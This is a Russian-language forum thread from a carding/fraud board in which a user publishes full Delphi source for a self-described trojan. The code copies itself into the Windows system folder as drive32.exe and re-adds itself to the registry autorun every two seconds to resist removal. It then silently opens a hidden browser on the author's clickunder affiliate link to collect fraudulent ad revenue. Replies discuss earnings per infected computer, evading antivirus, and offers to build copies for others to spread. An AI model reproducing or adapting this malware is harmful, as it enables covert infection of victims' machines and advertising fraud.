1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Сliker Для зароботка на http://www.clickunder.ru/

Тема в разделе "Наши статьи", создана пользователем SAIND, 4 фев 2013.

1. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Здарова всем .
    Написал трояна ,альтернативному Please login or register to view links.
    Т.к у многих пользователей стоят разные браузеры и наш троян бесполезен если жертва не пользуется Опрой ,Маилой ,Хромом да и геморойно прописывать в каждый браузер свою ссылку от кликундера . Теперь этот троян будет включать вашу ссылку независимо от браузера .И не зависимо какая сторонница домашняя у жертвы .:D
    Итак начнем для начала регистрируемся на Please login or register to view links Это партнерская ссылка Т.к надеюсь что я это делал все не зря .Писал статью и Саму программу придумывал .Думаю Администрация будет не против .
    1.Нам нужно скачать программу Depli .Вот ссылка Please login or register to view links
    2.Качаем сам проект Please login or register to view links пасс: Please login or register to view links
    3.Меняем ссылку в проекте на свою с вашего кликундера как я это делаю на видео ниже.

В видео изменил действие SW_Hide на SW_Show .... SW_Hide -Скрытно SW_Show-Не скрытно

Так все скомпилировали не забывайте что он прописался и на вашу винду .Но как его удалить вы поймете ниже когда я начну описывать код что он делает .
    Функции:
    1.Ожидает подключение к интернету как интернет появился через минуту запускает Please login or register to view links
    2.Прописывается в авто загрузку в реестр и не даёт её отключить .
    Копирует сам себя в папку C:\WINDOWS\system\ и начинает себя обзывать drive32.exe.

unit Unit1;

interface

uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, ShellAPI, StdCtrls, RegisTry, ExtCtrls, WinInet;

type
    TForm1 = class(TForm)
    Timer1: TTimer;
    Timer2: TTimer;
    Label1: TLabel;

procedure Timer1Timer(Sender: TObject);

procedure Timer2Timer(Sender: TObject);

private
    { Private declarations }
    public
    { Public declarations }
    end;

var
    Form1: TForm1;
    var reg: tregistry;
    dwConnectionTypes : DWORD;
    implementation

{$R *.dfm}

function ConnectedToInet: Boolean;
    begin
    dwConnectionTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN + INTERNET_CONNECTION_PROXY;
    Result := InternetGetConnectedState (@dwConnectionTypes, 0);
    end;

//код с верху ожидает подключение к интернету

procedure TForm1.Timer1Timer(Sender: TObject);
    //таймер прописывает пругу авто загрузку каждые 2 секунды чтобы было не выключить и не удалить
    var reg: tregistry;
    begin
    {$I-}
    reg := tregistry.create;
    reg.rootkey := hkey_local_machine;
    reg.lazywrite := false;
    reg.openkey('software\microsoft\windows\currentversion\run', false);
    reg.writestring('Drive', application.exename); {вместо programma можно вставить что нибудь своё} {вместо application.exename можно вставить путь к файлу например С:\virus.exe}
    reg.closekey;
    reg.free;
    //прописываемся в авто загрузку в реестр
    {$I+}

{$I-}

reg := tregistry.create;
    reg.rootkey := hkey_local_machine;
    reg.lazywrite := false;
    reg.openkey('software\microsoft\windows\currentversion\run', false);
    reg.writestring('drivev','C:\WINDOWS\system\drive32.exe'); {вместо programma можно вставить что нибудь своё} {вместо application.exename можно вставить путь к файлу например С:\virus.exe}
    reg.closekey;
    reg.free;

//прописываемся в авто загрузку в реестр {$I+}
    {$I-}
    CopyFile(PChar(ParamStr(0)), PChar('C:\WINDOWS\system\drive32.exe'), True);
    //копируемся
    end;

procedure TForm1.Timer2Timer(Sender: TObject);
    //таймер запускает после включения интернета через 40 секунд интернет экспортер с вашей ссылкой невидимо
    begin
    if ConnectedToInet then
    begin
    Label1.Caption:='Все пашет ' ;
    ShellExecute(Handle,'open','C:\Program Files\Internet Explorer\iexplore.exe','ВАША ССЫЛКА С КЛИКУНДЕРА', nil,SW_Hide);//если хочете увидеть как работает то измените SW_Hide на SW_Show
    Timer2.Enabled:=False;
    end
    else
    begin
    Label1.Caption:='Все не пашет пашет ' ;
    end;
    end;

end.

Ну вот вроде и все :Думаю смысл понятен .Работает все скрытно рекламма показывается скрытно со стандартного браузера ,пользователь не очем не догадывается .Ну все удачи в заробатыванни денег.
    P.S Вкачестве поочерения регистрируйтесь по моему инвайту Please login or register to view links
    2D6EF5792C563FC0E2A7 Т.к я эту тему выложил в паблик а не на продажу .Как некоторые.Будут вопросы пишите и не проверяйте на вирус тотале не должен еще палится коду 1 день отроду И вы эту программу считай создали сами .:D

Пример использования готового исходника :
    И этот исходник так будет делать на этом компе каждый день .

• Like Like x 12
    Метки:
  2. Walentinka

Walentinka

Симпатии:
    47
    Сколько капает с перехода?

3. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Все зависит от Ip :

Текущие ставки выкупа трафика:
    Характеристика трафика Глобальные хосты,
    руб. за 1000 Глобальные хиты,
    руб. за 1000
    Трафик мобильных устройств RU 400 200
    Трафик мобильных устройств 200 100
    Трафик форматов RICH-MEDIA (* до 50% ставки рекламодателя) 100-500 100
    Россия, POPUNDER 200 100
    Россия, POPUNDER, for childs & not adult 100 50
    Другие, POPUNDER 100 50
    AutoDirect, Россия 130 70
    AutoDirect, обычный, Россия 110 50
    AutoDirect, ближн. зарубеж 60 30
    AutoDirect, дальн. зарубеж 30 10
    Россия, обычный (сумма RU-трафика за предыдущие сутки - более 5000, или статус партнера - VIP) 170 50
    Россия, обычный (сумма RU-трафика за предыдущие сутки - более 500) 160 40
    Россия, обычный (сумма RU-трафика за предыдущие сутки - менее 500) 150 30
    Россия, for childs & Not Adult 50 30
    Ближний зарубеж: *(2) 40 30
    Дальний зарубеж + сайты без рубрик: 30 -
    Короче за россию всех больше платят ,Но от некоторых пробива не проходит ,но если вирь хорошо распространять то результат будет ,и темболие кликать будет каждый день .Я настроил систему и смотрю как деньги копятся .Еще на сайты ссылку сделай тоже прибыль Please login or register to view links Не кто не сказал что будет легко ,легких денег не бывает .

4. Walentinka

Walentinka

Симпатии:
    47

Как вариант заработка весьма спецефичен, но почему нет. Отпишись через "месяцок", похвастайся сколько снял.Рад любому опыту.
    А на счет легких денег ты прав,бесплатно только сыр в мышеловке и кожурки от семечек.

5. BloodWolf

BloodWolf Команда форума

Симпатии:
    360
    И сколько можно на этом заработать ? при условии что у тебя ~1000 компов

6. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    За россию всех больше платят ,тогда у меня клик прошел за 14 копеек 100 копров 14 руб немного но приятно за месяц накапливается ,троя качают и качают тоесть каждым днем все больше и больше,а в торояна можно и два ока прописать и три ,То есть комп один может работать не только на один акаунт и больше . Шас тему пытаюсь делать на Так.ру там по 20 копеек клик .Но пока проэкт на 50% Не знаю ,как пойдет ,может получится может нет

7. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Кто не может сам собрать пишите в личку сам соберу ,а вы ток рассылайте .Делать буду не за деньги .А вы будите их снимать с кликундера .

8. Lex

Lex

Симпатии:
    34
    Лучше билдер сделай :)

9. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Билдер делать это тогда вобще холява будет Русик такую пругу продаёт за 300 рублей(Please login or register to view links) ,А я её выложил Здесь за так и она лучше т.к не зависит от браузеров вобще .По барабану каким браузером пользуется пользователь .Мои интересы набрать себе рефералов ,а не с пацанов деньги тырить .Они ни чего не теряют(зарабатывают ) и мне хорошо .А просто так я бы и тему писать не стал .

10. Serge

Serge

Симпатии:
    38
    там же в правилах написано:

Будьте внимательны! Переходы по ссылкам данного формата жестко модерируются! Переход может быть осуществлен ТОЛЬКО по ссылке с какого-либо сайта (определяемый обратный УРЛ - обязательное условие, иначе будут фиксироваться "бот-входы")! Категорически запрещен трафик любых CAP-систем и другие способы обмана! Также запрещен почтовый СПАМ прямых ссылок. Работают автоматические механизмы определения нарушений, а также ручная проверка всех партнеров. К нарушителям принимаются самые жесткие меры - вплоть до пожизненного бана их аккаунтов и сайтов!

Как я понял, что если переход не с какого либо сайта то фиг что получишь после модерации.

11. barstor

barstor

Симпатии:
    15
    вот тебе и на:( а я губу ..........

12. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Вот смотри я тебе объясню ,что со одного компа (Тоесть IP) Кликундер принимает ток один клик в день то есть какой нахер спам ,Чето меня еще не разу не забонили .

13. Serge

Serge

Симпатии:
    38
    куда лучше дропать в win7 файлик? просто проактивка что бы не сработала и не заверещала типо того что файлы туда можно копировать и запускать только с правами админа из этих директорий, подскажите пути желательно что бы и на хрюше и на семерки не руагалась проактивка.

14. grs101

grs101

Симпатии:
    262
    Виктор, как код нужно изменить, куда дописать ссылки чтобы прога сразу на несколько акков работала? Делфи я не знаю, пробовал поменять что то не получается.

15. TopicStarter Overlay
    SAIND

SAIND

Симпатии:
    606
    Чтобы несколько аков нужно этот код водить три раза через таймер но при этом убивать процес экспортера .
    ShellExecute(Handle,'open','C:\Program Files\Internet Explorer\iexplore.exe','ВАША ССЫЛКА С КЛИКУНДЕРА', nil,SW_Hide);//если хочете увидеть как работает то измените SW_Hide на SW_Show

а так одним пользуйся .здесь надо переписывать .

• Like Like x 1
  16. Slavik007

Slavik007 Гость

Сколько можно зарабатывать , если допустим 500 человек?

Поделиться этой страницей

Загрузка...